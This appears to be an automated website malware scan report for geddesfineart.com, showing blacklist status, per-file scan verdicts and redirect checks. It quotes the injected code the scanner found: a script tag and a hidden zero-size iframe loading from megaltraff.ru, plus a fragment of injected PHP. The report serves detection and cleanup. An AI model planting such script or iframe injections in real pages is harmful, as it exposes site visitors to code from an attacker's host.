Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=geddesfineart.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://geddesfineart.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://geddesfineart.com/ | 200 OK Content-Length: 7064 Content-Type: text/html | malicious |
Page code contains blacklisted domain: megaltraff.ru ...[537 bytes skipped]... ntent-Type" content="text/html; charset=iso-8859-1"> <META name="Copyright" content="Copyright 2009 Õîëëè Ãåääåñ http://www.geddesfineart.com/"> <META name="revisit-after" content="15 äíåé"> <META name="robots" content="index, follow"> <META name="Robots" content="All"> <link rel=StyleSheet " href="coolstyle.css" type="text/css"> <body><nofollow><script language= " JavaScript " src= " http://megaltraff.ru/?1'></script></nofollow></body> <!--[åñëè IE]> <style type="text/css"> BODY { ïðîêðóòêè áàçîâûé öâåò: #7E9865 } òåëî { overflow:hidden; } #table-ñëîé { overflow:auto; } </style> <![endif]--> <script language="JavaScript" src="javascripts.js"></script> è <style type="text/css"> <!-- .style5 { color: #FFFF00; font-size: 12px; font-family: verdana, Æåíåâà, arial, helvetica, sans; } .style6 {color: #333333} .style11 {fo ...[7079 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://megaltraff.ru/?1 This URL is marked by Google as suspicious <iframe src="http://megaltraff.ru/?1" width="0" height="0" frameborder="0"> | ||
http://geddesfineart.com/ http://megaltraff.ru/?1'></script></nofollow></body> <!--[åñëè IE]> <style type= | 403 Forbidden Content-Length: 410 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: megaltraff.ru <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access / http://megaltraff.ru/ on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache Server at geddesfineart.com Port 80</address> </body></html> | ||
http://geddesfineart.com/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
http://geddesfineart.com/header_index.js | 200 OK Content-Length: 785 Content-Type: application/javascript | clean |
http://geddesfineart.com/copyright.js | 200 OK Content-Length: 688 Content-Type: application/javascript | clean |
http://geddesfineart.com/menu.js | 200 OK Content-Length: 1506 Content-Type: application/javascript | clean |
http://geddesfineart.com/ http://megaltraff.ru/?1'></script></nofollow></body> <?php $utstat=@file_get_contents( | 403 Forbidden Content-Length: 410 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: megaltraff.ru <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access / http://megaltraff.ru/ on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache Server at geddesfineart.com Port 80</address> </body></html> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: geddesfineart.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=86400
Connection: close
Date: Sat, 17 May 2014 01:31:17 GMT
Accept-Ranges: bytes
ETag: "9f3a837-1b98-4a24529593d40"
Server: Apache
Content-Length: 7064
Content-Type: text/html
Expires: Sun, 18 May 2014 01:31:17 GMT
Last-Modified: Mon, 02 May 2011 06:30:37 GMT
...7064 bytes of data.
GET / HTTP/1.1
Host: geddesfineart.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=86400
Connection: close
Date: Sat, 17 May 2014 01:31:17 GMT
Accept-Ranges: bytes
ETag: "9f3a837-1b98-4a24529593d40"
Server: Apache
Content-Length: 7064
Content-Type: text/html
Expires: Sun, 18 May 2014 01:31:17 GMT
Last-Modified: Mon, 02 May 2011 06:30:37 GMT
...7064 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: geddesfineart.com
Referer: http://www.google.com/search?q=geddesfineart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: geddesfineart.com
Referer: http://www.google.com/search?q=geddesfineart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.